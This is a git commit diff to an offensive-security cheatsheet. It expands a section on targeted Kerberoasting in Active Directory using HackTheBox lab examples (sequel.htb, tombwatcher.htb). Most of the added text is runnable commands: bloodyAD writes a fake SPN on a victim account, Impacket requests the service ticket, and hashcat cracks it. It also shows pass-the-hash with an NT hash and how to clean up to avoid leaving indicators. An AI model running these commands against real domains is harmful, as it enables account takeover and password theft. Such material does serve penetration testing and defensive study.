daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

commit da4192ee6a431f30aedf931a43c31da65b88387d
parent 742c5791258440ee1c018c0479138f9ace814ef2
Author: $: DAΞMON <zer0sec.xp@icloud.com>
Date:   Sat, 19 Sep 2026 06:05:48 +0100

docs(bloodyad): expand GenericWrite targeted Kerberoast section

- Add plain-English explanation of why planting an SPN enables roasting
- Explain what the SPN value (HTTP/fake) actually means and why it's arbitrary
- Document each step individually with inline notes on what the DC does
- Add tombwatcher.htb manual bloodyAD equivalent of targetedKerberoast
- Add tip: bloodyAD accepts :NTHASH in place of a plaintext password

Diffstat:
Msrc/content/sheets/active-directory/bloodyad.md | 61+++++++++++++++++++++++++++++++++++++++++++++++++++++++++----
1 file changed, 57 insertions(+), 4 deletions(-)

diff --git a/src/content/sheets/active-directory/bloodyad.md b/src/content/sheets/active-directory/bloodyad.md @@ -275,24 +275,77 @@ bloodyAD --host 10.10.11.51 -d sequel.htb -u ryan -p 'Passw0rd!' add groupMember Write to (most) attributes, but not the DACL. You can't reset the password, but you can plant an SPN, a Key Credential, or a logon script. -**Targeted Kerberoast — step 1, plant a fake SPN:** +#### Targeted Kerberoast + +**How it works.** Kerberos issues a TGS (service ticket) for any account that has a Service Principal Name. That ticket is encrypted with the account's password hash. Normally only service accounts have SPNs. GenericWrite lets you write `servicePrincipalName` on a regular user, so you plant a fake SPN, ask the DC for a ticket, and get a `$krb5tgs$` hash you can crack offline. The three steps are: plant → request → clean up. + +**Step 1 — plant a fake SPN on the target:** ```bash bloodyAD --host 10.10.11.51 -d sequel.htb -u ryan -p 'Passw0rd!' set object victim servicePrincipalName -v 'HTTP/fake.sequel.htb' ``` -**Targeted Kerberoast — step 2, request the TGS:** +`set object <target> servicePrincipalName -v '<value>'` writes the SPN attribute. The value itself (`HTTP/fake.sequel.htb`) is arbitrary — it just needs to look like a valid SPN so the DC accepts it. The account is now Kerberoastable. + +**Step 2 — request the TGS (this produces the crackable hash):** ```bash GetUserSPNs.py sequel.htb/ryan:'Passw0rd!' -dc-ip 10.10.11.51 -request-user victim ``` -**Targeted Kerberoast — step 3, clear the SPN (cleanup):** +The DC hands back a TGS encrypted with `victim`'s password hash. Impacket prints it as a `$krb5tgs$23$` hash ready for hashcat. + +**Step 3 — clear the SPN (cleanup):** ```bash bloodyAD --host 10.10.11.51 -d sequel.htb -u ryan -p 'Passw0rd!' set object victim servicePrincipalName ``` +Omitting `-v` clears the attribute. A stray SPN is an IOC and can break the account's authentication, so always clean up. + +**Crack the hash:** + +```bash +hashcat -m 13100 victim.hash /usr/share/wordlists/rockyou.txt +``` + +> **Tip — `targetedKerberoast` automates all three steps.** The tool sets the SPN, requests the TGS, and removes the SPN in one shot. Use bloodyAD's manual three-step flow when you want granular control or when `targetedKerberoast` is not available. +> +> ```bash +> targetedKerberoast -v -d sequel.htb -u ryan -p 'Passw0rd!' --request-user victim +> ``` + +> **Tip — bloodyAD accepts an NT hash instead of a password.** If you have a hash but no plaintext, pass it with a leading colon in place of the password. All three steps work the same way. +> +> ```bash +> # Plant +> bloodyAD --host 10.10.11.51 -d sequel.htb -u ryan -p ':aad3b435b51404eeaad3b435b51404ee' set object victim servicePrincipalName -v 'HTTP/fake' +> +> # Clean up +> bloodyAD --host 10.10.11.51 -d sequel.htb -u ryan -p ':aad3b435b51404eeaad3b435b51404ee' set object victim servicePrincipalName +> ``` +> +> The format is `:NTHASH` (LM blank, colon, then the 32-character NT hash). See the Authentication section for the full LM:NT form. + +**Manual bloodyAD equivalent for a different target (tombwatcher.htb example):** + +```bash +# Step 1 — plant the SPN (henry has GenericWrite or WriteSPN over alfred) +bloodyAD --host <DC-IP> -d tombwatcher.htb -u henry -p 'H3nry_987TGV!' \ + set object alfred servicePrincipalName -v 'HTTP/fake.tombwatcher.htb' + +# Step 2 — request the TGS +GetUserSPNs.py tombwatcher.htb/henry:'H3nry_987TGV!' -dc-ip <DC-IP> -request-user alfred + +# Step 3 — remove the SPN +bloodyAD --host <DC-IP> -d tombwatcher.htb -u henry -p 'H3nry_987TGV!' \ + set object alfred servicePrincipalName +``` + +```bash +hashcat -m 13100 alfred.hash /usr/share/wordlists/rockyou.txt +``` + **Shadow credentials (also available via GenericWrite):** ```bash @@ -486,7 +539,7 @@ bloodyAD --host 10.10.11.51 -d sequel.htb -u ryan -p 'Passw0rd!' remove rbcd 'DC ### WriteSPN -Write `servicePrincipalName` → targeted Kerberoast. Same three steps as under GenericWrite. +Write `servicePrincipalName` directly — a narrower right than GenericWrite, but the attack is identical. Follow the same three steps as under GenericWrite above. ```bash bloodyAD --host 10.10.11.51 -d sequel.htb -u ryan -p 'Passw0rd!' set object victim servicePrincipalName -v 'HTTP/fake.sequel.htb'